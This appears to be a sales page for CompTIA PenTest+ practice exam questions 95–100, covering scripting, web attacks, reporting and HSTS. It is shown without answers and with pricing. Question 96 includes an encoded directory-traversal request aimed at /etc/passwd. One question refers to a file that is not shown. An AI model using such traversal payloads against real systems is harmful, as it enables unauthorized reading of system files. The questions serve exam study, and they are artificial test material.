Questions 95

A penetration tester needs to test a very large number of URLs for public access. Given the following code snippet:

1 import requests

2 import pathlib

3

4 for url in pathlib.Path( " urls.txt " ).read_text().split( " \n " ):

5 response = requests.get(url)

6 if response.status == 401:

7 print( " URL accessible " )

Which of the following changes is required?

Options:

A.

The condition on line 6

B.

The method on line 5

C.

The import on line 1

D.

The delimiter in line 3

Buy Now
Questions 96

A penetration tester is trying to get unauthorized access to a web application and executes the following command:

GET /foo/images/file?id=2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Which of the following web application attacks is the tester performing?

Options:

A.

Insecure Direct Object Reference

B.

Cross-Site Request Forgery

C.

Directory Traversal

D.

Local File Inclusion

Buy Now
Questions 97

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

Options:

A.

Configuration changes were not reverted.

B.

A full backup restoration is required for the server.

C.

The penetration test was not completed on time.

D.

The penetration tester was locked out of the system.

Buy Now
Questions 98

A penetration tester wants to use multiple TTPs to assess the reactions (alerted, blocked, and others) by the client’s current security tools. The threat-modeling team indicates the TTPs in the list might affect their internal systems and servers. Which of the following actions would the tester most likely take?

Options:

A.

Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.

B.

Perform an internal vulnerability assessment with credentials to review the internal attack surface.

C.

Use a generic vulnerability scanner to test the TTPs and review the results with the threat-modeling team.

D.

Perform a full internal penetration test to review all the possible exploits that could affect the systems.

Buy Now
Questions 99

The following file was obtained during reconnaissance:

Which of the following is most likely to be successful if a penetration tester achieves non-privileged user access?

Options:

A.

Exposure of other users ' sensitive data

B.

Unauthorized access to execute binaries via sudo

C.

Hijacking the default user login shells

D.

Corrupting the skeleton configuration file

Buy Now
Questions 100

A penetration tester finds it is possible to downgrade a web application ' s HTTPS connections to HTTP while performing on-path attacks on the local network. The tester reviews the output of the server response to:

curl -s -i https://internalapp/

HTTP/2 302

date: Thu, 11 Jan 2024 15:56:24 GMT

content-type: text/html; charset=iso-8659-1

location: /login

x-content-type-options: nosniff

server: Prod

Which of the following recommendations should the penetration tester include in the report?

Options:

A.

Add the HSTS header to the server.

B.

Attach the httponly flag to cookies.

C.

Front the web application with a firewall rule to block access to port 80.

D.

Remove the x-content-type-options header.

Buy Now
Exam Code: PT0-003
Exam Name: CompTIA PenTest+ Exam
Last Update: Jul 10, 2026
Questions: 336

PDF + Testing Engine

$63.24 $180.69

Testing Engine

$48.24 $137.83

PDF (Q&A)

$53.24 $152.11